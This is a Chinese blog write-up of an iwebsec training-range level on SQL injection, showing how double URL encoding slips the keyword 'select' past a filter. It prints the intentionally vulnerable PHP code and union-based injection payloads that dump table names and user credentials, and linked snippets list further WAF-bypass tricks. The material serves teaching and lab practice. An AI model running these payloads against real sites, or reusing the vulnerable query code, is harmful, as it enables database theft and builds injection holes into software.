iwebsec sql-双重url编码绕过

最新推荐文章于 2025-03-04 14:40:18 发布
最新推荐文章于 2025-03-04 14:40:18 发布
阅读量797 收藏 1
点赞数 16
文章标签: sql web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134305797
版权

10-双重url编码绕过

原理分析:

双重url编码,即对于浏览器发送的数据进行了两次urlencode操作,如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码,这样解码之后的数据一般不会匹配到规则,达到了bypass的效果。

打开如下:

在这里插入图片描述

分析代码:

<?php
  if(isset($_GET['id'])){
	if (preg_match('/select/', $_GET["id"])) {
		die("ERROR");
	}else{
		$id = urldecode($_GET['id']);
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error());
//	echo "</font>";
	}

?>

preg_match 函数匹配 select 字符串,urldecode 函数对数据又进行了一次解码,按照题目意思是需要 url 编码绕过 select ,然后假设后台有 waf ,但是 waf 一般只会解码一次,我们进行两次编码就可以执行 SQL。

高版本PHP缺省设置 magicquotesgpc 为打开,这样一切get,post,cookie中的 '"\nul 都将被特殊处理为 \'\"\\0 ,可以防范大多数字符串SQL注入。

当 magicquotesgpc 未打开时,无需考虑此场景,其实 iwebsec 靶场漏洞库 就没有开启这个功能,也就是说单引号和双引号等特殊字符不会被特殊处理。在这个关卡中,没有,我们需要做出修改:

  <?php
echo("传输解码:".$_GET['id']);
echo"<br/>";
$id=$_GET['id'];
if(!get_magic_quotes_gpc()){
 echo "***asd slashes***".$id;
 echo "<br/>";
 $id=addslashes($id);
 echo "转义后:".$id;
}
  if(isset($id)){
	if (preg_match('/select/', $id)) {
		die("ERROR");
	}else{
		$id = urldecode($id);
		echo "<br/>";
		echo "二次解码后:".$id;
		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
  }else{
		exit();
	}
	if ($result) {
		?>
		<table class='table table-striped'>
      <tr><th>id</th><th>name</th><th>age</th></tr>
		<?php
		while ($row = mysql_fetch_assoc($result)) {
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
		}
		echo "</table>";
	}
	else
	{
//	echo '<font color= "#FFFFFF">';
	echo "<br/>";
	print_r(mysql_error());
//	echo "</font>";
	}

?>

get_magic_quotes_gpc 函数用于检测是否开启 magicquotesgpc,这里这个靶场是没开启的,我们自己用 addslashes 函数转义。

构造注入语句:

1 and 1=2 union se%25%36%63ect 1,2,database()
http://localhost:8050/sqli/07.php?id=1%0aunion%0aselect%0a1,2,(select%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database())%23 #全部表
mysql利用双重url编码绕过防火墙
一个码农的笔记
10-17 2057
例子: http://www.gzidc.org/search/ post 的数据: keyword=a 如果单纯的在搜索框中输入:select , union,detele,' 那么就会被waf阻拦页面会显示:非法字符 如果用双重编码url替换注入语句那么,waf就不会拦截 下面我写了一个程序来讲普通的注入语句转换为双重url编码: import stri
URL编码绕过WAF
技术超强的网络安全平台
11-21 2498
URL编码绕过WAF 符号\进行url编码一次是%5c。 但攻击者怕这个会被认出来,所以用二次编码,把%本身编码成%25。再和后边拼成%255c。 如果URL解码器有缺陷,只不断重复“从前边开始解析”这个步骤,就会把这个先变回%5c,再变成/,出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。 抵抗父级目录回溯攻击,绝对不能依赖字符过滤,你过滤不完的。必须用“鸭子编程法”,先不论如何构造完整路径,再检验是否在有权的操作目录下。 要正确进行URL解码,谨记使用PHP等语言提供的内部函数,切勿重复发
URI通过编码两次绕过参数验证
最新发布
FL__CL的博客
03-04 725
通常,Web 应用中的 URL 解析涉及多个组件(如浏览器、Web 服务器、应用服务器),它们可能在。在第一层解码之前执行,而最终访问路径的解析在第二层解码之后发生,就可能导致绕过。,会导致安全检查无效。在 Spring Boot 或其他 Web 框架中,,导致安全检查与实际执行路径不一致。如果检查发生在第一步前,就可能绕过认证。假设有一个 Web 应用,它会拦截。,然后拦截请求,返回 "非法路径"。是一个常见的安全问题,主要与。某些 Web 应用可能会阻止。,所以最好的方法是: ✅。
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的网络安全博客
11-30 3646
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
CTF学习笔记12:iwebsec-SQL注入漏洞-10-双重url编码绕过
lvx++的博客
01-23 1269
一、用第8题大小写绕过一样的payload就能得到结果 ?id=-1 union Select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users 二、进行一次urlencode编码来测试一下,也可以得到结果 ?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
Bugku -代码审计(urldecode二次编码绕过
weixin_34072857的博客
05-31 347
最近这段时间在做关于代码审计方面的题目,这一次把做的题目的解析发出来,希望能够帮助到学习代码审计的人。 这些题目我会全部上传解析过程哦!!!! 1: 解题思路:蒙蒙的我只有上网百度一下: 看到这些就知道应该如何构造post了:就是这样的: ?shiyan=&flag=就会得到答案: flag{bugku-dmsj-p2sm3...
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1925
sql注入漏洞
实验吧-PHP大法-eregi()函数
07-31 850
题目地址:http://www.shiyanbar.com/ctf/54 题目: <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[i...
Bugku - 代码审计 | urldecode二次编码绕过
多崎巡礼的博客
08-23 2512
正则表达式函数库   eregi 字符串比对解析,与大小写无关。 语法: int eregi(string pattern, string string, array [regs]); 返回值: 整数/数组 函数种类: 资料处理       内容说明 本函数和 ereg...
url双重编码
詹Sir的博客
08-26 479
需求:在安卓手机上要求可以在线预览PDF文件 使用PdfJS完成需求后发现中文乱码,一顿操作都不行,最后对URL进行双重编码,成功解决问题。
url中文乱码问题最好的解决办法-URL编码与两次encodeURI
happydecai的博客
12-19 1150
当使用地址栏提交查询参数时,如果不编码,非英文字符会按照操作系统的字符集进行编码提交到服务器,服务器会按照配置的字符集进行解码,所以如果两者不一致就会导致乱码。 encodeURI函数采用UTF-8对URL进行编码,所以如果服务器在进行解码时使用的是其他的编码方式就会出现乱码,默认的服务器配置的解码字符集都不是UTF-8,所以大部分情况下地址栏提交中文查询参数时会产生乱码;针对这
URL二次编码
weixin_33895016的博客
07-14 553
2019独角兽企业重金招聘Python工程师标准>>> ...
WAF绕过
liwenqianye的博客
12-21 2409
WAF绕过 数据 1、大小写变换 如:对某些关键字如:select、union、order、where进行关键字的过滤,能够采用SelEct、UniOn等大小写变换进行绕过。 id=1UnIoN/**/SeLeCT1,user() 2、使用嵌套 如对某些关键字替换为空,能够采用嵌套双写进行绕过,如碰到select或者union等关键字时会将其替换为空,此时能够尝试SELEselectCT、UNIunionON进行绕过。 3、空字节 一些过滤器在碰到空字节会中止过滤,如id=1 %00 and 1=1或id=
二次编码技巧
wangjian1012的博客
04-17 1633
http://way.nuptzj.cn/php/index.txt 通过二次url编码 id=%2568ackerDJ
什么是URL/URL编码绕过
好好睡觉
11-07 3306
URLURL绕过
为什么URL中的中文需要Encode两次?
weixin_30920853的博客
10-16 733
URL中传参的时候常常需要传入中文,这个时候就需要对中文参数进行编码,即URLEncode.但是,常常是Encode两次,而不是一次,为什么呢? 首先要知道,tomcat会自动解码一次; 这样的话,如果只Encode一次就传过去,会出现两种情况: 1.Tomcat的decode字符集与你Encode的字符集一致,正常显示中文; 2.decode与encode字符集不一致,乱码; 现在假...
39-1 Web应用防火墙 - WAF应用程序层绕过
weixin_43263566的博客
05-06 213
URL编码是一种将特殊字符转为%加上其ASCII值的方式,以确保在URL中传输时不会被误解或导致错误。例如,字母"s"的URL编码是"%73"。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值